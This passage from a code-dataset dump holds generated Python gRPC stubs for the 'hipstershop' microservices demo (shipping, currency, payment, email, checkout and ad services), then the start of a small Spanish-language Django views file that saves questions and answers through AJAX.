demo__pb2.Empty.SerializeToString,\n demo__pb2.ListProductsResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def GetProduct(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ProductCatalogService/GetProduct',\n demo__pb2.GetProductRequest.SerializeToString,\n demo__pb2.Product.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def SearchProducts(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, 
'/hipstershop.ProductCatalogService/SearchProducts',\n demo__pb2.SearchProductsRequest.SerializeToString,\n demo__pb2.SearchProductsResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass ShippingServiceStub(object):\n \"\"\"---------------Shipping Service----------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetQuote = channel.unary_unary(\n '/hipstershop.ShippingService/GetQuote',\n request_serializer=demo__pb2.GetQuoteRequest.SerializeToString,\n response_deserializer=demo__pb2.GetQuoteResponse.FromString,\n )\n self.ShipOrder = channel.unary_unary(\n '/hipstershop.ShippingService/ShipOrder',\n request_serializer=demo__pb2.ShipOrderRequest.SerializeToString,\n response_deserializer=demo__pb2.ShipOrderResponse.FromString,\n )\n\n\nclass ShippingServiceServicer(object):\n \"\"\"---------------Shipping Service----------\n\n \"\"\"\n\n def GetQuote(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ShipOrder(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_ShippingServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetQuote': grpc.unary_unary_rpc_method_handler(\n servicer.GetQuote,\n request_deserializer=demo__pb2.GetQuoteRequest.FromString,\n response_serializer=demo__pb2.GetQuoteResponse.SerializeToString,\n ),\n 'ShipOrder': grpc.unary_unary_rpc_method_handler(\n servicer.ShipOrder,\n request_deserializer=demo__pb2.ShipOrderRequest.FromString,\n response_serializer=demo__pb2.ShipOrderResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.ShippingService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass ShippingService(object):\n \"\"\"---------------Shipping Service----------\n\n \"\"\"\n\n @staticmethod\n def GetQuote(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ShippingService/GetQuote',\n demo__pb2.GetQuoteRequest.SerializeToString,\n demo__pb2.GetQuoteResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def ShipOrder(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ShippingService/ShipOrder',\n demo__pb2.ShipOrderRequest.SerializeToString,\n demo__pb2.ShipOrderResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass CurrencyServiceStub(object):\n \"\"\"-----------------Currency service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n 
Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetSupportedCurrencies = channel.unary_unary(\n '/hipstershop.CurrencyService/GetSupportedCurrencies',\n request_serializer=demo__pb2.Empty.SerializeToString,\n response_deserializer=demo__pb2.GetSupportedCurrenciesResponse.FromString,\n )\n self.Convert = channel.unary_unary(\n '/hipstershop.CurrencyService/Convert',\n request_serializer=demo__pb2.CurrencyConversionRequest.SerializeToString,\n response_deserializer=demo__pb2.Money.FromString,\n )\n\n\nclass CurrencyServiceServicer(object):\n \"\"\"-----------------Currency service-----------------\n\n \"\"\"\n\n def GetSupportedCurrencies(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Convert(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CurrencyServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetSupportedCurrencies': grpc.unary_unary_rpc_method_handler(\n servicer.GetSupportedCurrencies,\n request_deserializer=demo__pb2.Empty.FromString,\n response_serializer=demo__pb2.GetSupportedCurrenciesResponse.SerializeToString,\n ),\n 'Convert': grpc.unary_unary_rpc_method_handler(\n servicer.Convert,\n request_deserializer=demo__pb2.CurrencyConversionRequest.FromString,\n response_serializer=demo__pb2.Money.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.CurrencyService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass CurrencyService(object):\n \"\"\"-----------------Currency service-----------------\n\n \"\"\"\n\n @staticmethod\n def GetSupportedCurrencies(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CurrencyService/GetSupportedCurrencies',\n demo__pb2.Empty.SerializeToString,\n demo__pb2.GetSupportedCurrenciesResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def Convert(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CurrencyService/Convert',\n demo__pb2.CurrencyConversionRequest.SerializeToString,\n demo__pb2.Money.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass PaymentServiceStub(object):\n \"\"\"-------------Payment service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.Charge = channel.unary_unary(\n '/hipstershop.PaymentService/Charge',\n request_serializer=demo__pb2.ChargeRequest.SerializeToString,\n response_deserializer=demo__pb2.ChargeResponse.FromString,\n )\n\n\nclass PaymentServiceServicer(object):\n \"\"\"-------------Payment 
service-----------------\n\n \"\"\"\n\n def Charge(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_PaymentServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'Charge': grpc.unary_unary_rpc_method_handler(\n servicer.Charge,\n request_deserializer=demo__pb2.ChargeRequest.FromString,\n response_serializer=demo__pb2.ChargeResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.PaymentService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass PaymentService(object):\n \"\"\"-------------Payment service-----------------\n\n \"\"\"\n\n @staticmethod\n def Charge(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.PaymentService/Charge',\n demo__pb2.ChargeRequest.SerializeToString,\n demo__pb2.ChargeResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass EmailServiceStub(object):\n \"\"\"-------------Email service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.SendOrderConfirmation = channel.unary_unary(\n '/hipstershop.EmailService/SendOrderConfirmation',\n request_serializer=demo__pb2.SendOrderConfirmationRequest.SerializeToString,\n response_deserializer=demo__pb2.Empty.FromString,\n )\n\n\nclass EmailServiceServicer(object):\n \"\"\"-------------Email service-----------------\n\n \"\"\"\n\n def SendOrderConfirmation(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_EmailServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'SendOrderConfirmation': grpc.unary_unary_rpc_method_handler(\n servicer.SendOrderConfirmation,\n request_deserializer=demo__pb2.SendOrderConfirmationRequest.FromString,\n response_serializer=demo__pb2.Empty.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.EmailService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass EmailService(object):\n \"\"\"-------------Email service-----------------\n\n \"\"\"\n\n @staticmethod\n def SendOrderConfirmation(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.EmailService/SendOrderConfirmation',\n demo__pb2.SendOrderConfirmationRequest.SerializeToString,\n demo__pb2.Empty.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass CheckoutServiceStub(object):\n \"\"\"-------------Checkout service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n 
\"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.PlaceOrder = channel.unary_unary(\n '/hipstershop.CheckoutService/PlaceOrder',\n request_serializer=demo__pb2.PlaceOrderRequest.SerializeToString,\n response_deserializer=demo__pb2.PlaceOrderResponse.FromString,\n )\n\n\nclass CheckoutServiceServicer(object):\n \"\"\"-------------Checkout service-----------------\n\n \"\"\"\n\n def PlaceOrder(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CheckoutServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'PlaceOrder': grpc.unary_unary_rpc_method_handler(\n servicer.PlaceOrder,\n request_deserializer=demo__pb2.PlaceOrderRequest.FromString,\n response_serializer=demo__pb2.PlaceOrderResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.CheckoutService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass CheckoutService(object):\n \"\"\"-------------Checkout service-----------------\n\n \"\"\"\n\n @staticmethod\n def PlaceOrder(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CheckoutService/PlaceOrder',\n demo__pb2.PlaceOrderRequest.SerializeToString,\n demo__pb2.PlaceOrderResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass AdServiceStub(object):\n \"\"\"------------Ad service------------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetAds = channel.unary_unary(\n '/hipstershop.AdService/GetAds',\n request_serializer=demo__pb2.AdRequest.SerializeToString,\n response_deserializer=demo__pb2.AdResponse.FromString,\n )\n\n\nclass AdServiceServicer(object):\n \"\"\"------------Ad service------------------\n\n \"\"\"\n\n def GetAds(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_AdServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetAds': grpc.unary_unary_rpc_method_handler(\n servicer.GetAds,\n request_deserializer=demo__pb2.AdRequest.FromString,\n response_serializer=demo__pb2.AdResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.AdService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass AdService(object):\n \"\"\"------------Ad service------------------\n\n \"\"\"\n\n @staticmethod\n def GetAds(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.AdService/GetAds',\n demo__pb2.AdRequest.SerializeToString,\n demo__pb2.AdResponse.FromString,\n options, channel_credentials,\n 
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n", "sub_path": "src/emailservice/demo_pb2_grpc.py", "file_name": "demo_pb2_grpc.py", "file_ext": "py", "file_size_in_byte": 30091, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "demo_pb2.AddItemRequest", "line_number": 37, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 38, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetCartRequest", "line_number": 42, "usage_type": "attribute"}, {"api_name": "demo_pb2.Cart", "line_number": 43, "usage_type": "attribute"}, {"api_name": "demo_pb2.EmptyCartRequest", "line_number": 47, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 48, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 59, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 65, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 71, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 78, "usage_type": "call"}, {"api_name": "demo_pb2.AddItemRequest", "line_number": 80, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 81, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 83, "usage_type": "call"}, {"api_name": "demo_pb2.GetCartRequest", "line_number": 85, "usage_type": "attribute"}, {"api_name": "demo_pb2.Cart", "line_number": 86, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 88, "usage_type": "call"}, {"api_name": "demo_pb2.EmptyCartRequest", "line_number": 90, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 91, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 94, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 116, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 116, "usage_type": "attribute"}, {"api_name": "demo_pb2.AddItemRequest", "line_number": 117, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 118, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 133, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 133, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetCartRequest", "line_number": 134, "usage_type": "attribute"}, {"api_name": "demo_pb2.Cart", "line_number": 135, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 150, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 150, "usage_type": "attribute"}, {"api_name": "demo_pb2.EmptyCartRequest", "line_number": 151, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 152, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsRequest", "line_number": 170, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsResponse", "line_number": 171, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 182, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 189, "usage_type": "call"}, {"api_name": "demo_pb2.ListRecommendationsRequest", "line_number": 191, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsResponse", "line_number": 192, "usage_type": "attribute"}, {"api_name": 
"grpc.method_handlers_generic_handler", "line_number": 195, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 217, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 217, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsRequest", "line_number": 218, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsResponse", "line_number": 219, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 237, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListProductsResponse", "line_number": 238, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetProductRequest", "line_number": 242, "usage_type": "attribute"}, {"api_name": "demo_pb2.Product", "line_number": 243, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsRequest", "line_number": 247, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsResponse", "line_number": 248, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 259, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 265, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 271, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 278, "usage_type": "call"}, {"api_name": "demo_pb2.Empty", "line_number": 280, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListProductsResponse", "line_number": 281, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 283, "usage_type": "call"}, {"api_name": "demo_pb2.GetProductRequest", "line_number": 285, "usage_type": "attribute"}, {"api_name": "demo_pb2.Product", "line_number": 286, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 288, "usage_type": "call"}, {"api_name": "demo_pb2.SearchProductsRequest", "line_number": 290, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsResponse", "line_number": 291, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 294, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 316, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 316, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 317, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListProductsResponse", "line_number": 318, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 333, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 333, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetProductRequest", "line_number": 334, "usage_type": "attribute"}, {"api_name": "demo_pb2.Product", "line_number": 335, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 350, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 350, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsRequest", "line_number": 351, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsResponse", "line_number": 352, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteRequest", "line_number": 370, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteResponse", "line_number": 371, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderRequest", "line_number": 375, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderResponse", "line_number": 376, "usage_type": 
"attribute"}, {"api_name": "grpc.StatusCode", "line_number": 387, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 393, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 400, "usage_type": "call"}, {"api_name": "demo_pb2.GetQuoteRequest", "line_number": 402, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteResponse", "line_number": 403, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 405, "usage_type": "call"}, {"api_name": "demo_pb2.ShipOrderRequest", "line_number": 407, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderResponse", "line_number": 408, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 411, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 433, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 433, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteRequest", "line_number": 434, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteResponse", "line_number": 435, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 450, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 450, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderRequest", "line_number": 451, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderResponse", "line_number": 452, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 470, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetSupportedCurrenciesResponse", "line_number": 471, "usage_type": "attribute"}, {"api_name": "demo_pb2.CurrencyConversionRequest", "line_number": 475, "usage_type": "attribute"}, {"api_name": "demo_pb2.Money", "line_number": 476, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 487, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 493, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 500, "usage_type": "call"}, {"api_name": "demo_pb2.Empty", "line_number": 502, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetSupportedCurrenciesResponse", "line_number": 503, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 505, "usage_type": "call"}, {"api_name": "demo_pb2.CurrencyConversionRequest", "line_number": 507, "usage_type": "attribute"}, {"api_name": "demo_pb2.Money", "line_number": 508, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 511, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 533, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 533, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 534, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetSupportedCurrenciesResponse", "line_number": 535, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 550, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 550, "usage_type": "attribute"}, {"api_name": "demo_pb2.CurrencyConversionRequest", "line_number": 551, "usage_type": "attribute"}, {"api_name": "demo_pb2.Money", "line_number": 552, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeRequest", "line_number": 570, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeResponse", "line_number": 571, "usage_type": 
"attribute"}, {"api_name": "grpc.StatusCode", "line_number": 582, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 589, "usage_type": "call"}, {"api_name": "demo_pb2.ChargeRequest", "line_number": 591, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeResponse", "line_number": 592, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 595, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 617, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 617, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeRequest", "line_number": 618, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeResponse", "line_number": 619, "usage_type": "attribute"}, {"api_name": "demo_pb2.SendOrderConfirmationRequest", "line_number": 637, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 638, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 649, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 656, "usage_type": "call"}, {"api_name": "demo_pb2.SendOrderConfirmationRequest", "line_number": 658, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 659, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 662, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 684, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 684, "usage_type": "attribute"}, {"api_name": "demo_pb2.SendOrderConfirmationRequest", "line_number": 685, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 686, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderRequest", "line_number": 704, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderResponse", "line_number": 705, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 716, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 723, "usage_type": "call"}, {"api_name": "demo_pb2.PlaceOrderRequest", "line_number": 725, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderResponse", "line_number": 726, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 729, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 751, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 751, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderRequest", "line_number": 752, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderResponse", "line_number": 753, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdRequest", "line_number": 771, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdResponse", "line_number": 772, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 783, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 790, "usage_type": "call"}, {"api_name": "demo_pb2.AdRequest", "line_number": 792, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdResponse", "line_number": 793, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 796, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 818, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 818, "usage_type": 
"attribute"}, {"api_name": "demo_pb2.AdRequest", "line_number": 819, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdResponse", "line_number": 820, "usage_type": "attribute"}]} +{"seq_id": "439205128", "text": "from django.shortcuts import render\nfrom discusion.models import Pregunta, Respuestas\nfrom django.http import HttpResponse, Http404\nimport json\n\n\ndef guardar_pregunta(request):\n if request.is_ajax():\n\n if request.POST['pregunta']:\n pregunta = Pregunta(titulo=request.POST['pregunta'])\n pregunta.save()\n\n #Traemos las preguntas guardadas para mostrarlas desde la mas reciente\n preguntas = Pregunta.objects.all().order_by('-id')\n\n #luego pasamos la lista a la peticion Ajax pero serializadas o en forma de lista\n\n data = list()\n\n for pregunta in preguntas:\n data.append({'id': pregunta.pk, 'titulo': pregunta.titulo})\n\n return HttpResponse(\n json.dumps({'preguntas': data}),\n content_type = \"application/json; charset=utf8\"\n )\n else:\n raise Http404\n\n\ndef cargar_respuestas(request,id ):\n if request.is_ajax():\n respuestas= Respuestas.objects.filter(pregunta__id=id).order_by('-id')\n\n data = list()\n\n for respuesta in respuestas:\n data.append(respuesta.titulo)\n return HttpResponse(\n json.dumps({'respuestas': data, 'pregunta': id}),\n content_type=\"application/json, charset=utf8\"\n )\n else:\n raise Http404\n\ndef guardar_respuesta(request):\n if request.is_ajax():\n\n if request.POST['respuesta']:\n\n respuesta = Respuestas(titulo=request.POST['respuesta'], pregunta_id=request.POST['pregunta'])\n respuesta.save()\n\n return cargar_respuestas(request, request.POST['pregunta'])\n", "sub_path": "miniplataforma/discusion/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1616, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "discusion.models.Pregunta", "line_number": 11, "usage_type": "call"}, {"api_name": "discusion.models.Pregunta.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "discusion.models.Pregunta.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "discusion.models.Pregunta", "line_number": 15, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 29, "usage_type": "name"}, {"api_name": "discusion.models.Respuestas.objects.filter", "line_number": 34, "usage_type": "call"}, {"api_name": "discusion.models.Respuestas.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "discusion.models.Respuestas", "line_number": 34, "usage_type": "name"}, {"api_name": 